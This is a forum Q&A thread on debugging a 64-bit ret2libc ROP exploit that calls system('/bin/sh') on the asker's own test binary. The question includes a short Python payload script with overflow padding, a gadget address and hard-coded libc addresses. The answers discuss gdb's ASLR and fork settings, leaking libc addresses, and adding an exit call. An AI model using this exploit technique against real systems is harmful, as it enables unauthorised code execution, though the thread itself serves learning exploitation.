# ROP executes system("/bin/sh") but does not attach to it

Tags: exploit, buffer-overflow, rop

Here is the code:

```
import struct 
 
buf = ""
buf += "A" * 552
buf += struct.pack('<Q', 0x401493) # pop rdi; ret
buf += struct.pack('<Q', 0x7ffff7f79152) # /bin/sh
buf += struct.pack('<Q', 0x7ffff7e37e50) # system
 
file = open('in.txt', 'wb')
file.write(buf)
```

Running in gdb shows this:

```
[Attaching after process 5973 vfork to child process 5977]
[New inferior 2 (process 5977)]
[Detaching vfork parent process 5973 after child exec]
[Inferior 1 (process 5973) detached]
process 5977 is executing new program: /usr/bin/dash
[Attaching after process 5977 vfork to child process 5978]
[New inferior 3 (process 5978)]
[Detaching vfork parent process 5977 after child exec]
[Inferior 2 (process 5977) detached]
process 5978 is executing new program: /usr/bin/dash
[Inferior 3 (process 5978) exited normally]
```

Running without gdb (`(cat in.txt; cat) | ./program`) shows this:

```
zsh: broken pipe         ( cat in.txt; cat; ) | 
zsh: segmentation fault  ./program
```

What am I doing wrong? The ROP executes (it gets to system with "/bin/sh" in RDI) and gdb shows that it is trying to launch `/usr/bin/dash` (multiple times, for some reason) but no shell spawns

Kali 2021.3 x64, libc 2.31

Answer (score 1):

If you have ASLR turned on (the default) for the system, those libc addresses in your exploit (e.g. 0x7ffff7e37e50) won't work. GDB will disable ASLR for the current debuggee, set by the `disable-randomization` setting. The addresses will be the same each time in GDB, hence your successes while debugging. You can disable this behavior with `set disable-randomization off`.

The reason you don't get a shell in GDB is likely because you haven't set `follow-fork-mode` to `child`, as the default behavior is to detach from child processes.

If `system` and `/bin/sh` do not have pointers in the current binary, you will need to find a way to obtain those addresses dynamically at runtime, such as using a leak to expose and calculate the base of libc in memory.

Comment: I used `follow-fork-mode` but it exits before it attaches to the shell. The addresses are correct in the current context (as it says it executes `/bin/dash`). First I want to make it work inside gdb, then find a way to leak addresses in order to work with ASLR. The weird thing is it worked on another VM (with the addresses adjusted for it), I don't know why it is not working on this one

Comment: @Toma what exits, GDB? Thing is, your exploit likely _is_ already fully working

Comment: It executes `/bin/dash` two times (I don't know why two) then it just goes to the gdb console

Answer (score 0):

I encountered the same issue, and my workaround is adding an exit after the sys call. Otherwise it will crash.

You could do the same as you search for the address of `system` in gdb.